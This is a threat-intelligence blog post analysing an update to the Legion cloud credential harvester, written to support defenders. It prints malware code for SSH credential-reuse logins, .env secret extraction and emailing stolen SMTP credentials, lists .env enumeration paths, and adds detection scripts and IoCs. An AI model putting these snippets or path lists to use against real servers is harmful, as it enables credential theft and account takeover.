Updates to Legion: A Cloud Credential Harvester and SMTP Hijacker
Cado Labs recently discovered and reported on an emerging cloud-focused hacktool, designed to harvest credentials from misconfigured web servers and leverage these credentials for email abuse. The tool was named ‘Legion’ by its developers, and was distributed and marketed in various public groups and channels within the Telegram messaging service.
Cado researchers have now encountered what is believed to be an updated version of this commodity malware, with some additional functionality of interest to cloud security professionals.
SSH Abuse
In the sample of Legion previously analysed by Cado, the developers included code within a class named ‘legion’ to parse a list of exfiltrated database credentials and extract username and password pairs. The function then attempted to use these credentials in combination with a matching host value to log in to the host via SSH - assuming that these credentials were being reused across services.
To achieve this in Python, the tool uses the Paramiko library (a Python implementation of the SSHv2 protocol). In the original sample of Legion, however, the Paramiko import was commented out, so the SSH code could never run. In Legion's most recent update this functionality has been enabled.
import paramiko  # the import that was commented out in the earlier sample

# host, db_user and db_pass come from the parsed list of harvested database credentials
if db_user and db_pass:
    connected = 0
    ssh = paramiko.SSHClient()
    # accept any host key, so an unknown host never blocks the login attempt
    ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
    try:
        # try the database credentials against SSH on the same host (credential reuse)
        ssh.connect(host, 22, db_user, db_pass, timeout=3)
        fp = open('Results/!Vps.txt', 'a+')
        build = str(host)+'|'+str(db_user)+'|'+str(db_pass)+'\n'
        remover = str(build).replace('\r', '')
        fp.write(remover + '\n\n')
        fp.close()
        connected += 1
    except:
        pass
    finally:
        if ssh:
            ssh.close()
Python snippet of Legion’s SSH connection code
Exploiting Additional Cloud Services
Legion’s credential gathering capabilities were discussed at length in Cado’s previous blog on the topic. Essentially, the malware hunts for environment variable files in misconfigured web servers running PHP frameworks such as Laravel. Legion attempts to access these .env files by enumerating the target server with a list of hardcoded paths in which these environment variable files typically reside. If these paths are publicly accessible, due to misconfigurations, the files are saved and a series of regular expressions are run over their contents.
From the searches performed on the environment variable files, it’s easy to determine the services the malware attempts to retrieve credentials for. In the updated version of Legion, we can see the malware searching for credentials specific to the following services/technologies:
- DynamoDB
- Amazon CloudWatch
- AWS Owl (believed to be this project: https://github.com/ab/aws-owl)
For CloudWatch specifically, the malware searches for the environment variable CLOUDWATCH_LOG_KEY. This variable name appears in the documentation for public Laravel projects, including a project for handling CloudWatch logging in Laravel. This fits with Legion’s capabilities, as the tool’s credential harvesting feature targets Laravel apps.
# text holds the fetched .env content; reg() is a regex helper defined elsewhere in
# the script, and [0] takes the first match (the bare except catches the case of none)
elif "CLOUDWATCH_LOG_KEY" in str(text):
    if "CLOUDWATCH_LOG_KEY=" in str(text):
        method = '/.env'
        try:
            aws_key = reg("\nCLOUDWATCH_LOG_KEY=(.*?)\n", text)[0]
        except:
            aws_key = ''
        try:
            aws_sec = reg("\nCLOUDWATCH_LOG_SECRET=(.*?)\n", text)[0]
        except:
            aws_sec = ''
        try:
            # the region is pulled from the same file by a helper in the legion class
            asu = legion().get_aws_region(text)
            if asu:
                aws_reg = asu
            else:
                aws_reg = ''
        except:
            aws_reg = ''
Parsing .env files for the values of CLOUDWATCH_LOG_KEY and CLOUDWATCH_LOG_SECRET
# same structure as the CloudWatch branch, keyed on the AWS Owl variable names
elif "AWSOWL_ACCESS_KEY_ID" in str(text):
    if "AWSOWL_ACCESS_KEY_ID=" in str(text):
        method = '/.env'
        try:
            aws_key = reg("\nAWSOWL_ACCESS_KEY_ID=(.*?)\n", text)[0]
        except:
            aws_key = ''
        try:
            aws_sec = reg("\nAWSOWL_SECRET_ACCESS_KEY=(.*?)\n", text)[0]
        except:
            aws_sec = ''
        try:
            asu = legion().get_aws_region(text)
            if asu:
                aws_reg = asu
            else:
                aws_reg = ''
        except:
            aws_reg = ''
Parsing .env files for the values of AWSOWL_ACCESS_KEY_ID and AWSOWL_SECRET_ACCESS_KEY
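The snippets above show how Legion pulls individual variables out of a fetched .env file with the pattern \nNAME=(.*?)\n. The following is an added example, not Legion's code and not Cado's: a defender-side check that parses dotenv content properly (comments, an export prefix, quoted values, a missing final newline) and reports which entries a Legion-style harvester would extract, plus any value shaped like an AWS access key ID (20 uppercase alphanumerics, AKIA or ASIA prefix) stored under a name Legion does not look for. It also reproduces Legion's own regex to show the lines it misses. The variable names are the ones in the snippets above; the sample .env content and key material are constructed.

```python
import re

# Variable names that the Legion snippets above search for, and the service each belongs to.
LEGION_TARGET_KEYS = {
    "CLOUDWATCH_LOG_KEY": "Amazon CloudWatch",
    "CLOUDWATCH_LOG_SECRET": "Amazon CloudWatch",
    "AWSOWL_ACCESS_KEY_ID": "AWS Owl",
    "AWSOWL_SECRET_ACCESS_KEY": "AWS Owl",
}

# Documented AWS access key ID format: 20 uppercase alphanumerics, AKIA for long-term
# keys and ASIA for temporary ones. Catches keys stored under names Legion does not know.
AWS_ACCESS_KEY_ID_RE = re.compile(r"(AKIA|ASIA)[0-9A-Z]{16}")


def legion_style_extract(name, text):
    """Reproduce the pattern from the snippets above: the variable must be preceded by a
    newline and its value terminated by one. Returns '' on no match, like Legion's except."""
    m = re.search(r"\n" + re.escape(name) + r"=(.*?)\n", text)
    return m.group(1) if m else ""


def parse_env(text):
    """Parse dotenv-style content into a dict, handling comment lines, an `export ` prefix,
    quoted values, unquoted trailing comments and a missing final newline."""
    env = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or "=" not in line:
            continue
        if line.startswith("export "):
            line = line[len("export "):]
        key, _, value = line.partition("=")
        key, value = key.strip(), value.strip()
        if len(value) >= 2 and value[0] == value[-1] and value[0] in "\"'":
            value = value[1:-1]                       # one layer of matching quotes
        else:
            value = value.split(" #", 1)[0].rstrip()  # drop an unquoted trailing comment
        env[key] = value
    return env


def find_exposed_credentials(text):
    """Return (variable, service) pairs that a Legion-style harvester would extract from
    this .env content, plus any value that looks like an AWS access key ID by format."""
    hits = []
    for key, value in parse_env(text).items():
        if key in LEGION_TARGET_KEYS and value:
            hits.append((key, LEGION_TARGET_KEYS[key]))
        elif AWS_ACCESS_KEY_ID_RE.fullmatch(value):
            hits.append((key, "AWS access key ID (by format)"))
    return hits


# Constructed sample .env: made-up key material, a quoted value, an export prefix,
# and no trailing newline after the last line.
SAMPLE_ENV = """CLOUDWATCH_LOG_KEY=AKIAEXAMPLE000000001
CLOUDWATCH_LOG_SECRET="wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY"
# database settings, the same values Legion's SSH module reuses
DB_USERNAME=app
DB_PASSWORD=s3cret
MY_BUCKET_KEY=AKIAEXAMPLE000000003
export AWSOWL_ACCESS_KEY_ID=AKIAEXAMPLE000000002
AWSOWL_SECRET_ACCESS_KEY=another/secret"""

if __name__ == "__main__":
    for key in LEGION_TARGET_KEYS:
        print(f"Legion regex  {key:26s} -> {legion_style_extract(key, SAMPLE_ENV)!r}")
    for key, service in find_exposed_credentials(SAMPLE_ENV):
        print(f"exposed       {key:26s} -> {service}")
```

Run against the sample, Legion's regex returns an empty string for the first line (no preceding newline), for the export-prefixed line, and for the last line (no trailing newline), and returns the CloudWatch secret with its quotes still attached; the proper parser finds all four targeted variables plus the AKIA-shaped value under MY_BUCKET_KEY. The point for defenders is that a file which happens to dodge Legion's regex today is still exposed, and the check should be on what is reachable, not on what this version of the tool parses.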
Miscellaneous Updates
Aside from general refactoring, the Legion developers have made some additional updates to the hacktool.
One such update is a change to the subject line of the test emails sent by the malware, which now includes a reference to “King Forza”. The Forza name was also used by a YouTube channel that Cado researchers linked to the operators of Legion.
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText

# mailhost, mailport, mailuser, mailpass and mailfrom are harvested SMTP credentials;
# emailnow is the address that receives the test message containing them
smtp_server = str(mailhost)
login = str(mailuser.replace('"', ''))  # paste your login generated by Mailtrap
password = str(mailpass.replace('"', ''))  # paste your password generated by Mailtrap
receiver_email = emailnow
message = MIMEMultipart('alternative')
message['Subject'] = f'King Forza SMTP | {mailhost} '  # updated subject line
message['From'] = sender_email
message['To'] = receiver_email
text = ' '
# HTML body lists the credentials in two mailer-config formats, with and without a From address
html = f" <h3>King Forza smtps! - SMTP Data for you!</h3><br>{mailhost} <br><br><h5>Mailer King with from</h5><br>==================<br><i>{mailhost}:{mailport}:{mailuser}:{mailpass}:{mailfrom}:ssl::::0:</i><br>==================<br><br><h5>Mailer king Normal</h5><br>==================<br>{mailhost}:{mailport}:{mailuser}:{mailpass}::ssl::::0:<br>==================<br><br> "
part1 = MIMEText(text, 'plain')
part2 = MIMEText(html, 'html')
message.attach(part1)
message.attach(part2)
Snippet showing updated subject line, including Forza name
Another update adds further paths that are enumerated for the existence of .env files. The new paths are listed below:
/lib/.env
/lab/.env
/cronlab/.env
/cron/.env
/core/app/.env
/core/Datavase/.env (sic)
/database/.env
/config/.env
/apps/.env
/uploads/.env
/sitemaps/.env
/saas/.env
/api/.env
/psnlink/.env
/exapi/.env
/site/.env
/web/.env
/en/.env
/tools/.env
/v1/.env
/v2/.env
/administrator/.env
Conclusion
Legion is an actively developed hacktool, designed to exploit misconfigured web applications in order to harvest credentials. Its primary focus remains credentials for SMTP and SMS abuse. This update, however, widens its scope: the SSH module that was dead code in the earlier sample now attempts to log in to the harvested hosts with reused database credentials, and the .env parsing now also extracts CloudWatch and AWS Owl keys from Laravel web applications. The developers' targeting of cloud services is clearly advancing with each iteration.
Detection and prevention advice remains consistent with Cado’s prior blog on this malware family. Misconfigured web applications are still the primary means by which Legion retrieves credentials. Developers and administrators should therefore regularly confirm that .env files and other non-public paths are not reachable from the web root, and seek alternatives to storing long-lived secrets in environment files.
Advice to AWS users on detecting Legion activity also remains unchanged. The malware creates an IAM user and sets the tag “Owner” to the value “ms.boharas”. This is a strong indicator of compromise and can be used for detection engineering and investigations: the IAM CreateUser and TagUser calls that apply the tag are recorded by CloudTrail, so alerting on that tag key/value pair in those events catches the activity.
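As an added example (not from Cado or the original post), the following scans a CloudTrail log file for IAM CreateUser and TagUser events whose request parameters carry the Owner=ms.boharas tag and reports who made the call and from where. The record layout mirrors how CloudTrail records those calls (requestParameters with a userName and a tags list of key/value objects; the code normalises the casing rather than relying on it). The sample records, account ID, ARNs, addresses and user agents are constructed.

```python
import json

# Indicator from this post: Legion tags the IAM user it creates with Owner=ms.boharas.
LEGION_TAG_KEY = "Owner"
LEGION_TAG_VALUE = "ms.boharas"


def _tags_from(params):
    """Return {key: value} from a CloudTrail requestParameters block. CreateUser and
    TagUser carry the tags as a list of {key, value} objects; casing is normalised here."""
    if not isinstance(params, dict):
        return {}
    tags = params.get("tags") or params.get("Tags") or []
    out = {}
    for t in tags:
        if isinstance(t, dict):
            k = t.get("key", t.get("Key"))
            v = t.get("value", t.get("Value"))
            if k is not None:
                out[k] = v
    return out


def find_legion_iam_activity(records):
    """Return one finding per CreateUser/TagUser event that applies the Legion tag."""
    findings = []
    for ev in records:
        if ev.get("eventSource") != "iam.amazonaws.com":
            continue
        if ev.get("eventName") not in ("CreateUser", "TagUser"):
            continue
        params = ev.get("requestParameters") or {}
        if _tags_from(params).get(LEGION_TAG_KEY) != LEGION_TAG_VALUE:
            continue
        findings.append({
            "time": ev.get("eventTime"),
            "event": ev["eventName"],
            "user": params.get("userName"),
            "actor": (ev.get("userIdentity") or {}).get("arn"),   # whose keys were used
            "source_ip": ev.get("sourceIPAddress"),
            "user_agent": ev.get("userAgent"),
        })
    return findings


def scan_trail_file(raw_json):
    """CloudTrail log files wrap events in a top-level 'Records' array."""
    return find_legion_iam_activity(json.loads(raw_json).get("Records", []))


# Constructed CloudTrail file, trimmed to the fields used above. Not a real capture.
BOTO_UA = "Boto3/1.26.0 Python/3.10.6 Linux/5.15.0 Botocore/1.29.0"
SAMPLE_TRAIL = json.dumps({"Records": [
    {"eventTime": "2023-06-01T10:00:00Z", "eventSource": "iam.amazonaws.com",
     "eventName": "CreateUser",
     "userIdentity": {"arn": "arn:aws:iam::123456789012:user/laravel-app"},
     "sourceIPAddress": "198.51.100.7", "userAgent": BOTO_UA,
     "requestParameters": {"userName": "backup-svc",
                           "tags": [{"key": "Owner", "value": "ms.boharas"}]}},
    {"eventTime": "2023-06-01T10:05:00Z", "eventSource": "iam.amazonaws.com",
     "eventName": "CreateUser",
     "userIdentity": {"arn": "arn:aws:iam::123456789012:user/admin"},
     "sourceIPAddress": "203.0.113.5", "userAgent": "console.amazonaws.com",
     "requestParameters": {"userName": "new-dev",
                           "tags": [{"key": "Owner", "value": "platform-team"}]}},
    {"eventTime": "2023-06-01T10:07:00Z", "eventSource": "iam.amazonaws.com",
     "eventName": "TagUser",
     "userIdentity": {"arn": "arn:aws:iam::123456789012:user/laravel-app"},
     "sourceIPAddress": "198.51.100.7", "userAgent": BOTO_UA,
     "requestParameters": {"userName": "existing-user",
                           "tags": [{"key": "Owner", "value": "ms.boharas"}]}},
    {"eventTime": "2023-06-01T10:09:00Z", "eventSource": "s3.amazonaws.com",
     "eventName": "ListBuckets",
     "userIdentity": {"arn": "arn:aws:iam::123456789012:user/admin"},
     "sourceIPAddress": "203.0.113.5", "userAgent": "aws-cli/2.11.0",
     "requestParameters": None},
]})

if __name__ == "__main__":
    for f in scan_trail_file(SAMPLE_TRAIL):
        print(f"{f['time']} {f['event']:10s} user={f['user']} via {f['actor']} from {f['source_ip']}")
```

The actor ARN in each finding is the useful pivot: it identifies the key pair that was harvested, which is what needs rotating, and the source address and user agent separate the malware's scripted calls from a legitimate administrator applying an ordinary Owner tag.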
Are you interested in seeing the Cado Cloud Forensics and Incident Response platform in action? Schedule a demo with our team or check out our 14-day free trial.
For more information on responding to incidents in AWS, check out our free playbook the "Ultimate Guide to Incident Response in AWS".
Indicators of Compromise (IoCs)
Filename: og.py
SHA256: 6f059c2abf8517af136503ed921015c0cd8859398ece7d0174ea5bf1e06c9ada

User Agents (verbatim; note the misspellings in the fifth entry):
Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36
Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50
Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36
Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36
Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
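The .env path list from the Miscellaneous Updates section and the user-agent strings above can be turned into a web-server log check. The following is an added example, not Cado's or Legion's code: it parses combined-format access log lines (the Apache/nginx default), groups .env probes by source address, flags an address that requests several of the listed paths or sends one of the misspelled user agents (Mozlila, Bulid, Moblie), and records whether any probe returned HTTP 200, which means a file was actually served. The log lines are constructed and the addresses are from documentation ranges.

```python
import re
from collections import defaultdict

# The bare /.env (used as `method` in the parsing code) plus the paths added in this update.
LEGION_ENV_PATHS = {
    "/.env", "/lib/.env", "/lab/.env", "/cronlab/.env", "/cron/.env", "/core/app/.env",
    "/core/Datavase/.env", "/database/.env", "/config/.env", "/apps/.env", "/uploads/.env",
    "/sitemaps/.env", "/saas/.env", "/api/.env", "/psnlink/.env", "/exapi/.env", "/site/.env",
    "/web/.env", "/en/.env", "/tools/.env", "/v1/.env", "/v2/.env", "/administrator/.env",
}

# Misspelled tokens from one user-agent string in the IoC list; no real browser sends these.
LEGION_UA_TYPOS = ("Mozlila/", "Bulid/", "Moblie Safari")

# Combined log format: ip ident user [time] "METHOD path HTTP/x" status bytes "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<bytes>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)


def parse_line(line):
    """Return the log fields as a dict, or None for a line that is not combined format."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def detect_env_enumeration(lines, min_paths=3):
    """Group requests by source IP. Flag an IP that probes at least `min_paths` distinct
    paths from the Legion list, or that sends a misspelled user agent. Any probe answered
    with 200 means the file was served, which raises the severity to critical."""
    per_ip = defaultdict(lambda: {"paths": set(), "served": set(), "ua_hit": False})
    for line in lines:
        rec = parse_line(line)
        if not rec:
            continue
        path = rec["path"].split("?", 1)[0]   # ignore any query string
        state = per_ip[rec["ip"]]
        if path in LEGION_ENV_PATHS:
            state["paths"].add(path)
            if rec["status"] == "200":
                state["served"].add(path)
        if any(tok in rec["ua"] for tok in LEGION_UA_TYPOS):
            state["ua_hit"] = True
    findings = {}
    for ip, st in per_ip.items():
        if len(st["paths"]) >= min_paths or st["ua_hit"]:
            findings[ip] = {
                "probed": sorted(st["paths"]),
                "served": sorted(st["served"]),
                "ua_hit": st["ua_hit"],
                "severity": "critical" if st["served"] else "high",
            }
    return findings


# Constructed access-log lines. 198.51.100.23 behaves like Legion (rotating user agents,
# one of them misspelled, several .env paths, one served); 203.0.113.9 is ordinary traffic.
SAMPLE_LOG_LINES = [
    '198.51.100.23 - - [12/May/2023:08:14:01 +0000] "GET /.env HTTP/1.1" 404 153 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"',
    '198.51.100.23 - - [12/May/2023:08:14:02 +0000] "GET /api/.env HTTP/1.1" 404 153 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36"',
    '198.51.100.23 - - [12/May/2023:08:14:02 +0000] "GET /core/Datavase/.env HTTP/1.1" 404 153 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"',
    '198.51.100.23 - - [12/May/2023:08:14:03 +0000] "GET /administrator/.env HTTP/1.1" 200 812 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"',
    '203.0.113.9 - - [12/May/2023:08:20:10 +0000] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Firefox/113.0"',
    '203.0.113.9 - - [12/May/2023:08:20:11 +0000] "GET /.env HTTP/1.1" 404 153 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Firefox/113.0"',
]

if __name__ == "__main__":
    for ip, f in detect_env_enumeration(SAMPLE_LOG_LINES).items():
        print(ip, f["severity"], "probed:", f["probed"], "served:", f["served"], "ua:", f["ua_hit"])
```

The served list is the part to act on: a 200 for any of these paths means the file's contents should be treated as disclosed and every credential in it rotated, whatever this particular version of Legion happens to parse. Most of the user agents in the IoC list are ordinary browser strings, so the misspelled one is the only UA that is safe to alert on by itself; the path count carries the rest of the signal.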